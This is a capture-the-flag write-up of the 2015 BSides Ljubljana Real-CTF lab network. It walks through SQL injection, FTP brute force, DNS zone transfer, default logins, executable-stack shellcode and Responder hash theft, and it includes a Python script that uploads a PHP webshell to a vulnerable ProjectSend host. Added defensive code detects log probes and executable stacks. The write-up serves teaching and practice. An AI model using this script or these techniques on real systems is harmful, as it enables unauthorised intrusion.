Security BSides Ljubljana Real-CTF

In the spirit of Security BSides Ljubljana 2015 there was a CTF contest titled Real-CTF. Why choose such a title? Because it was designed like a virtual company with lots of vulnerabilities. Of course, the number and impact of the vulnerabilities were enhanced so that the playground spread along both the X and Y axes of fun. Here is a short write-up.

Let’s start with a network diagram.

[Image: network diagram]

There were 23 flags to capture. The flags could be obtained by discovering and hacking vulnerabilities of the virtual environment. The first 7 flags and one additional flag were on the starting point of the competition (192.168.66.6) in the form of riddles to solve and some basic information disclosure vulnerabilities, like for example the presence of Readme.html, a browsable directory and a backup file that some editors create (index.php~).

Before going deeper we need to apologize to all the hackers who were trying to break the honeypot at IP address 192.168.66.19. It was a waste of time.

The next interesting hosts were on IP addresses 192.168.66.8 and 192.168.66.10. The host at IP address 192.168.66.8 had a robots.txt file with a flag and a hint. The robots.txt was restricting the URL http://192.168.66.8/user:1. So if hackers enumerated the users they would discover that a flag was hidden on http://192.168.66.8/user:10 (user enumeration vulnerability). The host was also vulnerable to SQL injection: the URL http://192.168.66.8/user:10' triggered an exception. If the SQLi was successfully exploited, the flag was found in the database CMS inside the table CMSUSERS.
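As an added illustration, not part of the original write-up: the two behaviours on 192.168.66.8 (walking /user:N ids one after another and sending a quote that makes the application throw an exception) leave a distinctive trace in the web server's access log. The Python below parses constructed Apache-style log lines and flags the clients showing them; the sample lines, the /user:&lt;id&gt; path shape and the enumeration threshold are assumptions for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" format; not from the CTF hosts.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Apr/2015:10:01:01 +0200] "GET /user:1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [09/Apr/2015:10:01:02 +0200] "GET /user:2 HTTP/1.1" 200 498 "-" "Mozilla/5.0"
10.0.0.5 - - [09/Apr/2015:10:01:04 +0200] "GET /user:10 HTTP/1.1" 200 530 "-" "Mozilla/5.0"
10.0.0.5 - - [09/Apr/2015:10:01:05 +0200] "GET /user:10%27 HTTP/1.1" 500 1024 "-" "Mozilla/5.0"
10.0.0.9 - - [09/Apr/2015:10:02:00 +0200] "GET /user:7 HTTP/1.1" 200 500 "-" "curl/7.38"
"""
# Only the fields the checks need are captured: client IP, request path, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
# The CMS addressed profiles as /user:<id>; the id runs up to the next '/' or '?'.
USER_RE = re.compile(r'^/user:(?P<uid>[^/?]*)')
# A numeric id should never carry these; a lone quote is the classic SQLi probe.
PROBE_CHARS = set("'\";")

def parse_line(line):
    """Return ip/path/status for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m["ip"], "path": unquote(m["path"]), "status": int(m["status"])}

def analyse(log_text, enum_threshold=3):
    """Per client IP: distinct user ids walked, quote probes sent, and 5xx responses
    (the leaked exception) so the two behaviours described above stand out."""
    stats = defaultdict(lambda: {"ids": set(), "probes": 0, "errors": 0})
    for line in log_text.splitlines():
        rec = parse_line(line)
        um = USER_RE.match(rec["path"]) if rec else None
        if not um:
            continue  # unparsable line or not a profile request
        uid, client = um["uid"], stats[rec["ip"]]
        if uid.isdigit():
            client["ids"].add(uid)
        elif PROBE_CHARS & set(uid):
            client["probes"] += 1
        if rec["status"] >= 500:
            client["errors"] += 1
    return {ip: {"enumeration": len(c["ids"]) >= enum_threshold,
                 "distinct_ids": len(c["ids"]),
                 "sqli_probe": c["probes"] > 0,
                 "server_errors": c["errors"]} for ip, c in stats.items()}
```

Run it over a real access log by passing the file contents to analyse(); the threshold should be raised for sites where legitimate users browse many profiles.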

On the host at IP address 192.168.66.10 there was a vulnerable version of ProjectSend. Anybody who had updated Metasploit should have found the exploit at exploit/unix/webapp/projectsend_upload_exec. Of course, the host could also be exploited manually by writing a simple script. Here is a Python example that uploads a simple PHP webshell.

```python
# Python 2 script using the "poster" library for multipart/form-data uploads
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers
import urllib2

# Register poster's streaming handlers with urllib2
register_openers()

# Build a multipart body from the local PHP webshell file
datagen, headers = multipart_encode({"file": open("./simple-backdoor.php")})

# The target file name is passed to the upload handler in the query string
request = urllib2.Request("http://192.168.66.10/process-upload.php?name=shell.php", datagen, headers)

# Send the upload and print the server's response
print urllib2.urlopen(request).read()
```


Additional flags were hidden on the host with IP address 192.168.66.11, where an FTP server was listening and an SNMP service with the default community string “public” was enabled. If hackers brute forced the FTP server with the username “admin” and the rockyou.txt password list that comes with Kali Linux, access was granted quickly. After accessing the FTP server there was a binary file that needed to be reverse engineered. Unlocking the binary gave an additional flag.

The next big step, the one that gave wings, was a host at IP address 192.168.66.15 with DNS zone transfer enabled. The zone transfer revealed additional virtual hosts, and an internal IP address was also leaked. The figure below shows a successful zone transfer.

[Image: dnszone, a successful DNS zone transfer]

After updating the local hosts file with the additional virtual hosts at IP addresses 192.168.66.7 and 192.168.66.9, two new web applications could be accessed. On host 192.168.66.7 there was a vulnerable version of CMS mini. But just accessing http://web1.real-ctf.com could give hackers 2 new flags. One was hidden inside the HTML code and the other was a base64 encoded image. If hackers decoded the image, additional information was revealed.

[Image: ctf20]

Back to the vulnerable CMS mini version. At http://web1.real-ctf.com/admin hackers could log in to the admin interface by using the default username “admin” and password “password”. After getting access hackers got an additional flag, which could also be obtained by accessing the URL http://web1.real-ctf.com/pages/dir.list. This version of CMS mini allowed hackers to upload arbitrary files. By uploading a simple PHP webshell and looking around the file system an additional flag was discovered.

Now let’s talk about the host at IP address 192.168.66.9. If hackers accessed the URL http://web3.real-ctf.com, the virtual host would serve the page below.

[Image: web3 page]

The page was custom made and contained an authentication bypass vulnerability. It had something to do with URL (GET parameter) modification and MD5. By solving the puzzle an additional flag was obtained. But wait, the web3.real-ctf.com virtual host also contained a backup directory with a commit.php subpage. By committing some random text an error was displayed, as shown below.

[Image: commit.php error]

Looks familiar. Yes, it is a direct C code compiler application that compiles and runs your C code. And yes, for the hackers we made the stack executable, so that they could google for some C shellcode. Successful exploitation and looking around the file system gave another flag.
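Added check, not from the original write-up: whether a compiled binary asks for an executable stack is recorded in its ELF PT_GNU_STACK program header, which is what readelf -l shows under GNU_STACK. The Python below reads that header from an ELF64 image so a defender can verify what a compile-and-run service like the one above actually produces; the minimal test image builder is constructed for the example and is not a loadable binary.

```python
import struct

PT_GNU_STACK = 0x6474E551  # program header that carries the requested stack permissions
PF_X = 0x1                 # execute bit in p_flags

def stack_is_executable(elf):
    """True if the ELF64 image asks for an executable stack.

    Mirrors `readelf -l <binary> | grep GNU_STACK`: PF_X set means executable,
    and on x86 Linux a missing PT_GNU_STACK entry also yields an executable stack.
    """
    if elf[:4] != b"\x7fELF" or elf[4] != 2:  # EI_CLASS 2 = ELFCLASS64
        raise ValueError("not an ELF64 image")
    end = "<" if elf[5] == 1 else ">"          # EI_DATA 1 = little endian
    (e_phoff,) = struct.unpack_from(end + "Q", elf, 0x20)
    e_phentsize, e_phnum = struct.unpack_from(end + "HH", elf, 0x36)
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from(end + "II", elf, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            return bool(p_flags & PF_X)
    return True  # no PT_GNU_STACK at all: loader default on x86 is executable

def check_file(path):
    """Convenience wrapper for a binary on disk, e.g. the output of a compile service."""
    with open(path, "rb") as f:
        return stack_is_executable(f.read())

def build_minimal_elf(stack_flags=None):
    """Constructed test image (assumption for this example, not a loadable binary):
    an ELF64 header followed by one PT_GNU_STACK entry, or none if stack_flags is None."""
    ehsize, phentsize = 64, 56
    phnum = 0 if stack_flags is None else 1
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8   # ELF64, little endian, v1
    header = ident + struct.pack("<HHIQQQIHHHHHH", 2, 0x3E, 1, 0, ehsize, 0, 0,
                                 ehsize, phentsize, phnum, 0, 0, 0)
    phdr = b"" if phnum == 0 else struct.pack("<IIQQQQQQ", PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 0)
    return header + phdr

if __name__ == "__main__":
    print("RW- stack executable:", stack_is_executable(build_minimal_elf(0x6)))  # False
    print("RWX stack executable:", stack_is_executable(build_minimal_elf(0x7)))  # True
```

A binary built with gcc -z execstack carries PF_X in this header, which is the setting the write-up describes; a hardened build should report False here.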

Now let’s come to the final act. I don’t know about you, but we prefer getting inside a company when conducting a penetration test. Playing around in the DMZ zone gives a lot of useful information, but a hacker’s goal should be the other network zones. For example, the Server zone looks very promising. But because of time limitations the virtual environment contained only a DMZ and a User zone. Flag 20 gave hackers an idea about the network structure and a hint about the attacker. It looked like the attacker was already inside the User zone. There was also a riddle written down everywhere.

My name is master and my IP is my name. You want to know my password?

Of course…

The answer is 0, 1, 1, 2, 3, 5, 8, 13, 21, 34,…

In the language of the internet the name is the DNS system. Remember the DNS zone transfer and the internal IP address that was leaked? Yes, this is the attacker’s IP address. The first part of the riddle indicated that the username was master, the second part was the IP address of the attacker and the third part was a sequence of numbers. This sequence was nothing else but the Fibonacci sequence, so the third part of the riddle was the password, which was fibonacci. Now hackers should have had all the information needed to access the attacker machine except the service and the port. If hackers had successfully exploited some of the hosts in the DMZ zone they were able to scan for open ports on the attacker machine. After some time port 2222 was found to be open. A closer look revealed that on port 2222 an SSH server was waiting for incoming connections.

Now that the hackers were on the attacker’s machine it was almost game over. First they noticed a tool named Responder. Responder enabled hackers to grab hashes coming from Windows hosts. After running Responder on the attacker’s machine a hash was grabbed very soon, because in the User zone a Windows machine was constantly emitting hashes. Cracking the hash with a tool like John gave hackers the final flag 23.

Posted by Danijel Grah, on 9.4.2015